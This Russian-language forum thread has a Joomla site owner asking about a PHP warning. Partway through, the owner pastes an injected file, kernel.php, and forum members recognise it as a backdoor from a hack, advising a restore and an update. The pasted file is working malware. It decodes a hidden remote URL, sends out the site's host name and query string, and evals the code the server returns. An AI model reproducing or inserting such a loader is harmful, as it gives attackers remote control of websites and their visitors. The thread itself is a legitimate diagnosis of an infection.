Ошибка на сайте

 
0
 
PHP
ava
ncuxolupuk | 27.03.2013, 12:07
Здравствуйте.
В шапке сайта появилась такая надпись
Warning: file_get_contents(http://46.17.41.133/door/dor.php?h=www.site.ru&c=) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/users2/n/ncuxolupuk/domains/site.ru/includes/kernel.php on line 7

На сайте больше месяца никаких изменений не делал вообще.
Что это, вирус? ошибка на хосте? Подскажите, люди добрые smile 
Comments (6)
ava
baldina | 27.03.2013, 11:20 #
а файл то (путь) есть, который он просит?
ava
ncuxolupuk | 27.03.2013, 11:25 #
/home/users2/n/ncuxolupuk/domains/site.ru/includes/kernel.php

вы про этот файл? Есть
вот что в нем написано:


<?php
### System file with control settings ###
//------------------------------------//
$durl = 'aHR0cDovLzQ2LjE3LjQxLjEzMy9kb29yL2Rvci5waHA=';
$c = urlencode( $_GET['q'] ); $h = $_SERVER['HTTP_HOST'];
if( ini_get( "allow_url_fopen" ) == 1 ) {
    eval( file_get_contents( base64_decode( $durl ) . '?h=' . $h . '&c=' . $c ) );
} elseif( function_exists( 'curl_init' ) ) {
    $ch = curl_init( base64_decode( $durl ) . '?h=' . $h . '&c=' . $c );
    curl_setopt( $ch, CURLOPT_HEADER, FALSE );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE );
    eval( curl_exec( $ch ) );
    curl_close( $ch );
} elseif( function_exists( 'fsockopen' ) ) {
    $pu    = parse_url( base64_decode( $durl ) . '?h=' . $h . '&c=' . $c );
    $hn = $pu['host']; $rq = $pu['path'] . '?' . $pu['query'];
    $fp = fsockopen( $hn, 80 );
    fputs( $fp, "GET {$rq} HTTP/1.0\r\nHost: {$hn}\r\n\r\n" );
    while( !feof( $fp ) ) {
        $line .= fgets( $fp, 1024 );
    } fclose( $fp );
    eval( preg_replace( "/^(.*\r\n\r\n)/isU", "", $line ) );
} else echo 'false';
?>
ava
MoLeX | 27.03.2013, 11:30 #
что за CMS?
нужно сделать проверку в оригиналом файле и у вас. но меня напрягает eval который выполняется при получение данных с удаленного сервера. похоже вас взломали
ava
ncuxolupuk | 27.03.2013, 11:43 #
Joomla

При удаленнии этой строки
eval( file_get_contents( base64_decode( $durl ) . '?h=' . $h . '&c=' . $c ) );

на которую и ругается ошибка, сайт перестает работать
ava
ncuxolupuk | 27.03.2013, 12:09 #
с помощь. резервного восстановления заменил папку includes на более раннюю, там этого файла нет.
и вместе с ними index.php
всё прошло)) smile 
спасибо за наводку smile 
ava
Fortop | 27.03.2013, 20:34 #
Поскольку дыра не закрыта, то есть шанс близкий к единице, что вас взломают еще раз.

Смотрите актуальную версию Joomla и обновляйтесь пока не поздно.
Please register or login to write.
Firm of day
Вы также можете добавить свою фирму в каталог IT-фирм, и публиковать статьи, новости, вакансии и другую информацию от имени фирмы.
Подробнее
Contributors
advanced
Submit